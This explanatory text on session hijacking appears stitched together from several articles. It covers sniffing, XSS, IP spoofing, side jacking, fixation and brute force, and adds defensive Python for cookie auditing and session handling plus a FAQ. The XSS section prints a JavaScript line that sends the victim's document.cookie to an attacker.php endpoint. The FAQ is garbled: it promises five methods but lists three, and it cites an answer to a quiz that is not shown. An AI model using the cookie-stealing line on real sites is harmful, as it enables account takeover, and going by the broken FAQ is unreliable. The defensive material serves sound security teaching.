What are the different types of session hijacking, and what are the countermeasures against it?

    What is Session Hijacking?
    TCP session hijacking is a security attack on a user session over a protected network. The most common method of session hijacking is called IP spoofing, where an attacker uses source-routed IP packets to insert commands into an active communication between two nodes on a network and disguises itself as one of the authenticated users. This type of attack is possible because authentication is typically done only at the start of a TCP session.

    Another type of session hijacking is known as a man-in-the-middle attack, where the attacker, using a sniffer, can observe the communication between devices and collect the data that is transmitted.

    Different ways of session hijacking:

      There are many ways to perform session hijacking. Some of them are given below:
      • Using Packet Sniffers
        [Figure: the attacker captures the victim's session ID with a packet sniffer]

        In the above figure, it can be seen that the attacker captures the victim's session ID by using a packet sniffer and then uses it to gain access to the server.

      • Cross Site Scripting (XSS Attack)
        An attacker can also capture the victim's session ID through an XSS attack using JavaScript. If the attacker sends the victim a crafted link containing malicious JavaScript, then when the victim clicks on the link, the JavaScript runs in the victim's browser and carries out the attacker's instructions, for example:

    var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);

    [Figure: code injection via XSS]

  • IP Spoofing
    Spoofing is pretending to be someone else. This is a technique used to gain unauthorized access to a computer by using the IP address of a trusted host. To carry it out, the attacker has to obtain the IP address of the client and inject his own packets, spoofed with the client's IP address, into the TCP session, so as to fool the server into believing that it is communicating with the victim, i.e. the original host.
  • Blind Attack
    If the attacker is not able to sniff packets and thus cannot learn the sequence number the server expects, combinations of sequence numbers can be tried by brute force.
  • Mitigation

    To defend a network against session hijacking, a defender has to implement security measures at both the application level and the network level. Network-level hijacks can be prevented by encrypting the packets so that the hijacker cannot decipher the packet headers to obtain any information that would aid in spoofing. This encryption can be provided by protocols such as IPsec, SSL and SSH. IPsec (Internet Protocol Security) can encrypt packets using a shared key between the two parties involved in the communication. IPsec runs in two modes: Transport and Tunnel.
    In Transport mode only the payload of the packet is encrypted, while in Tunnel mode both the packet headers and the payload are encrypted, so it is the more restrictive of the two.

    Session hijacking is a serious threat to networks and web applications, as most systems are vulnerable to it.

    This article is contributed by Akash Sharan.

    Session hijacking can leave you locked out of your critical accounts. Read on to learn what session hijacking attacks are and what can be done to avoid them.


    A session hijacking attack is one in which an attacker takes over the user session of their victim. A user session is created every time a user logs in to an online service: banking sites, shopping sites, your webmail, etc. all create user sessions once you’ve signed in. These sessions are tracked by the server using a session cookie. If an attacker gets their hands on your session cookie, they can log into your accounts as if they were you, bypassing the need for a password. Sound scary? It is.

    In this article, we'll look at how the attack works and what can be done to protect against it.

    Session cookies

    Whenever you log in to an online service, the server sets a temporary cookie on your machine so that it knows that you’re logged in and authenticated. Without that session cookie, you would need to re-enter your credentials whenever you navigate to another section of the website. A session hijacking attack can occur when an attacker has a copy of the victim’s session cookie. Once the attacker has access to the victim’s session cookie, they can log in to the service in question as if they were the user and make transactions, change the settings, etc., in the user account.

    The session cookie contains a session ID that identifies your session and your status. That’s the golden nugget the attacker is after. To obtain it, the attacker must either steal it or convince their victim to click on a malicious link containing a pre-configured session ID. In either case, once the legitimate user has successfully logged in to their account, the attacker can take over the session (that’s the hijacking part) by using the same session ID as the victim did. The server is fooled into authenticating the attacker as the legitimate user.

    What can an attacker do with a hijacked session?

    Because the server believes the attacker to be the legitimate user, there are no limits placed on what the attacker can do versus the original user.

    Account takeovers usually start with the attacker changing the email address associated with the account to an address under their control. They would then change the password on the account, locking the legitimate user out of their own account, and then proceed to change the security questions in the account, the phone number registered in the account, etc.

    This buys the attacker time, while the locked-out user is presumably on the phone with customer service, to do things like transfer funds from the user’s bank accounts, make purchases on behalf of the victim, steal sensitive personal information, etc., based on the account that was compromised. Anything the user could do, the attacker can now do as well. Ouch.

    How do session hijacking attacks work?

    There are many different ways to perform a session hijacking attack. The method used will depend on the server’s configuration and the attacker’s ability to compromise it. Here are the five most common ways to perpetrate a session hijacking attack.

    Cross-site scripting (XSS)

    Cross-site scripting is the most widespread method to carry out a session hijacking attack. When a web server is vulnerable to cross-site scripting, an attacker can inject scripts (usually written in JavaScript) into web pages and trick your web browser into executing arbitrary code when the compromised page is loaded.

    An attacker could craft a link containing a malicious script that points to a trusted website. When clicked, it will send a copy of the victim’s session cookie to a site controlled by the attacker. They could distribute the link through email or instant messaging. If the victim clicks the link, they just handed their session cookie to the attacker. In this context, the attack will be successful if the server does not validate and sanitize user input.

    Such a link could look like this:

    http://www.trustedsite.com/search?

    Of course, were this an actual attack URL, the attacker would likely use URL shortening services and character encoding in an attempt to fly under the radar.

    An XSS-based session hijacking attack would typically unfold as follows:

    1. The attacker injects the script into the link URL.
    2. The victim authenticates themselves on the server.
    3. The server returns a page with the injected script to the victim.
    4. The victim’s browser executes the malicious script and unwittingly sends their session cookies to a server controlled by the attacker.
    5. The attacker hijacks the victim’s session using the victim’s session cookie.

    Session side jacking

    Another common method of pulling off a session hijacking attack is session side jacking. It relies on having access to the victim’s network, so it usually implies unsecured WiFi networks, be they public or private.

    It also requires that the website in question only uses HTTPS for the login page and not when the authenticated user navigates about the site. This is becoming less and less common.

    So, with access to the victim's network and the knowledge that the service they will log into doesn't use HTTPS throughout the site, the attacker will either sniff/monitor the user's traffic on public WiFi or, for private WiFi, set up their own access point impersonating the victim's SSID and mount a man-in-the-middle (MitM) attack to intercept the victim's traffic. In either case, as the victim is authenticated and navigates around the website, the attacker can see everything going over the wire. That includes the victim's session cookies.

    Worse, if the man-in-the-middle attack is set up prior to the victim entering their credentials, and no HTTPS is used at all, the attacker gets those too. Your web browser should warn you if this is the case.
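Side jacking needs cookies that the browser will send over plain HTTP and a site that does not force HTTPS after login. The following Python check, added here and not part of the original article, parses a raw HTTP response head and flags exactly those conditions (no HSTS header, a redirect to a plaintext URL, a session cookie without Secure, and, from the XSS section, one without HttpOnly); the two sample responses are constructed, not real captures.

```python
# Constructed sample responses (not real captures): a login redirect as a
# weakly configured site might send it, and the hardened equivalent.
WEAK_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: http://shop.example/account\r\n"
    "Set-Cookie: sid=9f2c1a7e; Path=/\r\n"
    "\r\n"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: https://shop.example/account\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Set-Cookie: sid=9f2c1a7e; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> list:
    """Split a raw HTTP response head into (name, value) pairs; names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def side_jacking_findings(raw: str) -> list:
    """Return the conditions in this response that a side-jacking attacker relies on."""
    headers = parse_headers(raw)
    findings = []
    if not any(name == "strict-transport-security" for name, _ in headers):
        findings.append("no HSTS: later navigation may fall back to plain HTTP")
    for name, value in headers:
        if name == "location" and value.lower().startswith("http://"):
            findings.append(f"redirect to plaintext URL: {value}")
        if name != "set-cookie":
            continue
        cookie_name = value.split(";", 1)[0].split("=", 1)[0]
        # Attribute names after the first "name=value" pair, e.g. {"path", "secure"}
        attrs = {a.strip().split("=", 1)[0].lower() for a in value.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {cookie_name} lacks Secure: also sent over HTTP")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name} lacks HttpOnly: readable by script")
    return findings


if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, side_jacking_findings(resp) or "no findings")
```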

    Session fixation

    Session fixation is another way to get to the victim’s cookies – by “fixing” the session. This method relies on the attacker already having a known session ID for the site in question in their possession. The attacker could then send a malicious login link containing the known session ID to the victim via email, IM, etc. The link uses the genuine URL but appends the attacker’s ID to the end.

    If the victim logs in to the site using the link, they will be authenticated using the attacker’s known session ID. Once that happens, the attacker can hijack the session as above.

    An example link would look something like this:

    Click here to log in

    The attacker could also direct the victim to a legitimate-looking fake login page that would actually log the victim into the legitimate website but using the attacker’s session ID. Again, if the victim logs in, the attacker can hijack the session.

    Malware

    Malware is another common way to obtain session cookies for session hijacking attacks. Once the malware is installed, it will scan the victim’s web traffic from the inside and report the victim’s session IDs back to the attacker. Or, depending on the malware in question, it could access the victim’s cookies directly from the browser’s local storage.

    Brute force

    Session IDs are strings of characters that are generated by the server. Suppose the server uses simple sequential patterns to generate its users’ session IDs (user0001, user0002, user0003, etc). In that case, there’s a good chance the attacker could “guess” (using software programs to cycle through thousands of possibilities quickly) the user’s session ID.

    This was a big issue in the past, but today, most websites generate long and random session IDs, rendering brute force attacks impractical.

    Session hijacking attack examples

    Firesheep

    Firesheep is a Mozilla Firefox extension, released in 2010, that provided an easy way to extract private information, including session cookies, from users of unencrypted WiFi networks. Sites like Twitter and Facebook were vulnerable to Firesheep until they enabled HTTPS throughout their respective websites.

    DroidSheep

    DroidSheep is an Android app that enables session hijacking, previously available on Google Play. It scans HTTP packets and extracts the session cookies’ session ID. DroidSheep supports unencrypted WiFi networks, WEP-secured WiFi networks, and even WPA/WPA2-encrypted networks, as long as they use a pre-shared key (PSK).

    FaceNiff

    FaceNiff is another Android app used for session hijacking on public WiFi networks. But this one never made it onto Google Play, and your phone must be rooted in order to use the app. The app works by sniffing the traffic on the network and systematically searching for login credentials to large websites, such as Facebook, YouTube, and more. Once FaceNiff finds interesting packets, it analyzes them and then presents the attacker with the victim's login credentials in a friendly user interface.

    How can you prevent session hijacking attacks?

    How to defend against session hijacking attacks depends on which side of the attack you find yourself on: the user side or the server side. We'll start with tips for the server side before moving on to client-side defenses.

    Server-side defenses

    These are measures that site administrators can implement to mitigate session hijacking attacks.

    • Use HTTPS across the entire website to wrap all traffic in SSL/TLS encryption. This way, an attacker cannot intercept session IDs in plain text, even if they monitor the victim’s traffic. If possible, you should also use HSTS (HTTP Strict Transport Security) to make sure that all connections are encrypted and to prevent man in the middle (MitM) attacks.
    • Set the HttpOnly attribute using the Set-Cookie HTTP header to bar client-side scripts from accessing cookies. This measure will also protect your website/application from cross-site scripting (XSS) and other JavaScript injection attacks. Adding the Secure and SameSite directives is also recommended.
    • Use well-established web frameworks for session ID generation and management rather than using a homegrown solution.
    • Use long random numbers or strings as the session ID. This will limit your vulnerability to brute force attacks.
    • Regenerate the session ID after the user has been authenticated. This will close the door on session fixation attacks because the session ID changes before the attacker has a chance to use it. Also, consider changing the session ID with every user request. This would significantly reduce the amount of time an attacker would have to exploit a compromised session ID.
    • Don’t rely solely on the session ID for user authentication. Validate the identity of your users by other means as well. This could be the user’s usual IP address or their application usage patterns.
    • Set a user inactivity timeout to close the user session after a certain amount of idle time.
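As an added example that is not from the original article, here is a minimal Python session store that applies three of the server-side measures above: session IDs drawn from the OS CSPRNG, regeneration of the ID at login so that a fixated ID never becomes the ID of an authenticated session, and an inactivity timeout. The store itself, its injectable clock and the 15-minute timeout are assumptions made for the demo, not the API of any framework.

```python
import secrets
import time

# Assumed for the demo (not from the article): 15-minute idle timeout.
IDLE_TIMEOUT_SECONDS = 15 * 60


def new_session_id() -> str:
    """128 bits from the OS CSPRNG, URL-safe: long, random, never sequential."""
    return secrets.token_urlsafe(16)


class SessionStore:
    """In-memory session table keyed by session ID (demo only, not a framework)."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock      # injectable so tests can advance time
        self._sessions = {}      # sid -> {"user": str or None, "last_seen": float}

    def create_anonymous(self) -> str:
        """Pre-login session, e.g. for a shopping cart."""
        sid = new_session_id()
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def login(self, presented_sid: str, user: str) -> str:
        """Bind the user to a fresh ID and discard whatever ID the client presented.
        A fixated ID (one the attacker already knows) is therefore never the ID
        of an authenticated session."""
        self._sessions.pop(presented_sid, None)
        new_sid = new_session_id()
        self._sessions[new_sid] = {"user": user, "last_seen": self._clock()}
        return new_sid

    def lookup(self, sid: str):
        """Return the user of a live session (None if anonymous, expired or unknown).
        An idle session is dropped on its first use after the timeout."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        now = self._clock()
        if now - entry["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[sid]
            return None
        entry["last_seen"] = now
        return entry["user"]

    def logout(self, sid: str) -> None:
        """Server-side invalidation: a stolen copy of the ID is useless afterwards."""
        self._sessions.pop(sid, None)
```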

    Client-side defenses

    The client-side defenses are simply common-sense measures that any internet user should follow.

    • Use a firewall – All major operating systems have a built-in incoming firewall, and all commercial routers on the market have a built-in NAT firewall. Make sure to enable them.
    • Never click on pop-ups.
    • If your browser displays a warning about a website you are trying to access, you should pay attention and get the information you need elsewhere.
    • Disable JavaScript in your web browser, either natively or using a browser extension, such as NoScript.
    • Only open email attachments if you trust the sender and you’re sure that you can verify their identity – viruses do come in the mail, and that’s why it’s always a good idea to scan all your incoming mail with an antivirus program.
    • Keep your programs up to date. Malware and viruses typically try and exploit security flaws found in outdated software.
    • Make sure to log out of websites when you’re done.
    • If you receive an email asking for information while claiming to be from an official organization with which you have a relationship, read it very carefully before doing anything. Does it have spelling and grammar mistakes? Does it have an air of urgency? These are classic signs of a phishing attempt. And remember that your bank or the government will never ask you to send them sensitive information by email.
    • Don’t click links (URLs) in emails unless you know exactly who sent the URL and where it links to. And even then, scrutinize the link. Is it an HTTP or an HTTPS link? Most legitimate sites use HTTPS today. Does the link contain spelling errors (gooogle instead of google)? If you can get to the destination without using the link, do that instead.

    What is the countermeasure for session hijacking?

    Prevention: methods to prevent session hijacking include encryption of the data traffic passed between the parties by using SSL/TLS, in particular the session key (though ideally all traffic for the entire session).

    What are five methods of session hijacking?

    There are five key methods of session hijacking: session fixation, session side jacking, cross-site scripting.

    Which of the following is the best countermeasure to session hijacking?

    Answer 103. Option B. Explanation: encryption makes any information the hacker gathers during a session-hijacking attempt unreadable.

    What is session hijacking in networking?

    A session hijacking attack can be best defined as a successful attempt of an attacker to take over your web session. An attacker can impersonate an authorized user to gain access to a domain, server, website, web application, or network to which access is restricted through this type of attack.